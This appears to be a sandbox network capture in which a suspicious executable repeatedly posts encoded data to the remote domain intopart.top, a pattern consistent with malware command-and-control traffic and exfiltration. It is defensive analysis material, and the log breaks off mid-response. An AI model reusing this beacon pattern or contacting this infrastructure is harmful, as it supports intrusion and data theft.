Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:07.751200914 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:07.861212969 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:07.861439943 CEST	1080	OUT	Data Raw: 5d 5e 5a 50 50 5a 5e 53 54 56 50 51 5a 52 51 52 5b 5a 5e 42 54 5e 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZPPZ^STVPQZRQR[Z^BT^PE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\'>,Z#;$==,(3Z)2+=('U3S,,=7=$* Z/!Z/4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:08.005433083 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:08.116322041 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:08.116647959 CEST	1788	OUT	Data Raw: 58 5b 5f 5d 55 5b 5e 53 54 56 50 51 5a 50 51 54 5b 52 5e 40 54 53 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[_]U[^STVPQZPQT[R^@TSPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Z2='70X$=)[-&,W'<()>([?R3#,8%#"' Z/!Z/<
Apr 29, 2024 01:03:08.398468971 CEST	728	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COMAVF4x2%2BZol3ll1NAqy7iG8qxd89kXRcKXawWJl8oAcGtvAYTyFErfN8VczNgTg%2FUymrtSQkpZ2Rcm19A8UVEE2S2RzTfbHXfd9IX0ujVVELyknIQ1pTcrEeX9XXI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf1369d922f3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 58 3f 5d 21 57 29 54 26 54 30 0c 38 0b 26 3f 01 18 2a 11 3a 45 25 23 20 14 2d 3e 32 52 24 1a 0a 5a 23 07 30 5e 25 57 33 1f 2b 24 20 59 02 1c 39 44 26 39 2a 13 31 07 37 5f 28 31 35 5f 23 3e 06 5b 3e 3b 22 50 24 01 3d 5f 3f 55 22 5c 2b 07 2f 08 2c 2d 2e 04 26 27 09 53 3f 35 2c 52 08 13 20 1e 3c 20 1a 12 35 06 37 10 30 0b 2e 1a 32 1b 01 51 35 06 23 0d 3c 17 01 04 24 1c 2e 10 26 1c 2d 0d 2c 33 33 41 37 12 0b 5a 30 07 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 X?]!W)T&T08&?:E%# ->2R$Z#0^%W3+$ Y9D&917_(15_#>[>;"P$=_?U"\+/,-.&'S?5,R < 570.2Q5#<$.&-,33A7Z0!\/ I4]S
Apr 29, 2024 01:03:08.398519993 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:08.279171944 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:08.388940096 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:09.843292952 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:03:09.953226089 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:09.953404903 CEST	1076	OUT	Data Raw: 5d 5e 5a 5d 55 5c 5b 55 54 56 50 51 5a 56 51 52 5b 52 5e 48 54 5d 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z]U\[UTVPQZVQR[R^HT]PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&=8]#T3$>9/5'$<Y=)%?''#,8,"7 6^0: Z/!Z/
Apr 29, 2024 01:03:10.331360102 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFkJOGlVfn0mOJhTQidlC8h7gxFlB3dQJLTMUbl0qJB5xRfiTamCcC9Rvibpnyh5VZjCYogRKc2MM47edeEPaXvbiySKlQs6l5aMYwdreJ%2Bjh56ZxafDtelsJUVVUfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf1eef716209-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:10.331403017 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:10.838294029 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:10.949091911 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:10.949290037 CEST	1080	OUT	Data Raw: 58 5e 5a 51 50 59 5e 52 54 56 50 51 5a 54 51 51 5b 5f 5e 46 54 5c 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^ZQPY^RTVPQZTQQ[_^FT\PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'2-]#'%>5[8&-$_*+=30/W8/-X4\0 Z/!Z/,
Apr 29, 2024 01:03:11.342880011 CEST	591	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBp0VfmgSHKREbZL2%2FRlHW9Yg5xzZK1Ol%2FRZEcxkw9hPZ5A%2Bm%2B2qRdXWBxY4%2F1syCJ6dqFa5%2Fyd5MlkjqAZon4YuWePgm1uzNcPqCibVN%2FFd90dkL4%2FKGtVsciXDZgk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf2518e02992-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:11.342926025 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:11.581865072 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:11.692524910 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:11.692837954 CEST	1080	OUT	Data Raw: 58 53 5a 59 55 5e 5e 53 54 56 50 51 5a 5e 51 54 5b 5d 5e 41 54 5b 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZYU^^STVPQZ^QT[]^AT[PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&=7T8$.6-6,0^)*+=W$8-/" 0&_$ Z/!Z/
Apr 29, 2024 01:03:12.095587015 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTsofrbt8BuoP4cFbn1CIqJCZKXsDgWbgwDks3P6iXN4YsRJJFawbcOGeUGfE%2B2PBvJFIoBBQAFAPepFeHgx0ZAMm4oJQm9fZMJc3VzqJ7wsQSc8pAOHBcF2LXGney0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf29c9842919-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:12.095607042 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49780	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:12.333444118 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:12.444514990 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:12.444662094 CEST	1080	OUT	Data Raw: 58 5d 5a 5f 50 5b 5e 54 54 56 50 51 5a 54 51 57 5b 5f 5e 45 54 53 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]Z_P[^TTVPQZTQW[_^ETSPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2- <1\/67'-$Y)&U+=?W$/W8,![76_$ Z/!Z/,
Apr 29, 2024 01:03:12.836689949 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8uZXGZgQc0DKr5inurm%2Fx93cUpx9dZwZAGdNtm86ShkwGHFvJtrdtTIR7B4II%2BKGkInKqfXSY91dAQqqhSY4VtgEGgitiBgMrvkhO2MCq7e8b65m8N%2F7Wmln1fFGsc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf2e7c7b2a3c-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:12.836728096 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49781	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:14.653798103 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1772 Expect: 100-continue
Apr 29, 2024 01:03:14.764416933 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:14.764650106 CEST	1772	OUT	Data Raw: 58 5e 5a 5d 50 5c 5e 55 54 56 50 51 5a 56 51 5a 5b 5e 5e 45 54 5e 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^Z]P\^UTVPQZVQZ[^^ET^PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']%> 4"+%>8%+' Y)%+-/'#$,%\4\$ Z/!Z/
Apr 29, 2024 01:03:15.171694994 CEST	730	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gIDlXVyMF2kf3UpKV3UXvH%2FLHdZrHbIMAdqG%2B46QVgeni8kpOkZiOBHy9YJSTDwzgles6Gqj9rDiYsV6R7%2BUY3QeLfoCl7k6ra7CHgbakBfBSLwUzYVgnvuOwNyMs88%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf3cf92ee15f-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5d 29 3b 3e 0c 28 32 08 54 24 1c 01 19 31 3c 37 1a 29 3c 29 1a 32 0a 3b 03 2d 2e 03 0b 30 1a 38 5c 20 39 05 06 26 08 2f 1d 2b 34 20 59 02 1c 3a 19 25 07 2e 13 31 2d 3b 59 3f 1c 3e 05 21 00 2b 05 2a 2b 3d 0f 33 3f 36 05 28 30 3a 1f 2b 17 30 1d 2e 2d 25 5a 26 34 33 52 3c 25 2c 52 08 13 23 0d 3f 56 20 56 22 5e 20 0a 24 54 32 5e 31 25 3b 56 22 38 37 0c 28 29 0a 1b 30 32 22 1f 32 0c 0c 50 2d 55 27 41 20 2c 07 58 25 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ]);>(2T$1<7)<)2;-.08\ 9&/+4 Y:%.1-;Y?>!+*+=3?6(0:+0.-%Z&43R<%,R#?V V"^ $T2^1%;V"87()02"2P-U'A ,X%-!\/ I4]S
Apr 29, 2024 01:03:15.171720028 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:14.768249035 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:14.877993107 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:14.878349066 CEST	1080	OUT	Data Raw: 58 5e 5f 5a 50 5b 5e 54 54 56 50 51 5a 54 51 56 5b 5a 5e 40 54 52 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^_ZP[^TTVPQZTQV[Z^@TRPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%0\78\&>_8&<U00Z)\2).#V'#8="3"\0 Z/!Z/,
Apr 29, 2024 01:03:15.297904968 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLiBGufUa822t9wrqHwu4UL7gp264sDw6Wk%2B3TxstsI1N3%2F3STgri7jN5UpifMKBvlZ5%2Fyl4wjo0KFM8RfffSQ7EYJcB8pLWfPx3YjxMjlSkNmPFtBcsbDzg3iZta5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf3daa48117b-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:15.297954082 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49783	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:15.753792048 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:15.864470005 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:15.885550022 CEST	1080	OUT	Data Raw: 58 5f 5a 5e 55 5d 5b 50 54 56 50 51 5a 57 51 51 5b 59 5e 48 54 5a 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_Z^U][PTVPQZWQQ[Y^HTZPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&.8#2#1=/,'-0)U).,33S8\430 Z/!Z/
Apr 29, 2024 01:03:16.281096935 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUJ5%2BQOXVwHfbdKp%2FBiDkgBXKXPsyfghVUskiIrmijyF98RZ1bqD2HpT7r8wxwIlu7PetzTQ6CIOtx9ysJLKpq8Mm1nuDhPpWpmcdPTVFb9jtU9ui2T51QiflJoQFAQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf43df522268-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:16.281164885 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49784	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:20.096327066 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:20.206621885 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:20.206804991 CEST	1080	OUT	Data Raw: 58 5e 5a 50 55 5c 5b 55 54 56 50 51 5a 5e 51 55 5b 5a 5e 42 54 5c 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^ZPU\[UTVPQZ^QU[Z^BT\PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'- _ T0%6/50'=)>?[/$3,%\ :[0 Z/!Z/
Apr 29, 2024 01:03:20.624994040 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryfjam6tVtEM27yv0LLAai4AR2kUWrOYD5PXCfiZSGqJTCmKm6jPxWxmDOuvFaItVYnw8ebD%2FHgAzXX8msuv%2B7yIacR%2BJx2CSjUgDIvhm2jtoMTXhtNorSU6HqDyn38%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf5efacf2dba-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:20.625046968 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49785	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:20.308522940 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:20.419194937 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:20.419712067 CEST	1788	OUT	Data Raw: 58 5c 5f 58 55 5d 5e 56 54 56 50 51 5a 54 51 50 5b 5e 5e 46 54 5c 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_XU]^VTVPQZTQP[^^FT\PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X2./#!<X1>9[/%&- _=1?/0#,Y>7&Z$ Z/!Z/,
Apr 29, 2024 01:03:20.704251051 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyQP5llqr%2BOAkqLQdhb9YQyTvIbGZsBLEYZ8db0b%2BACsY4VJPA9DbGUspSsPUA7phNthsIeWB1YFkQj%2BTFAZ5eivbUuHJiACjcdxrcFNghh7P%2F9EFIEeAFOwDTSTnmo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf604a4829f1-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 58 3f 3b 26 0d 2a 54 32 18 30 32 27 57 31 06 2b 1d 29 59 2e 09 26 1d 0e 5e 2f 58 22 50 27 34 2c 5a 37 29 2b 00 25 0f 3f 55 28 34 20 59 02 1c 3a 18 26 39 2a 5e 26 58 3b 16 29 21 26 05 36 2e 34 1e 2a 06 3e 14 30 3c 25 15 28 30 2d 05 28 2a 27 0c 2c 3e 21 5d 27 27 3b 55 3c 1f 2c 52 08 13 20 10 28 30 16 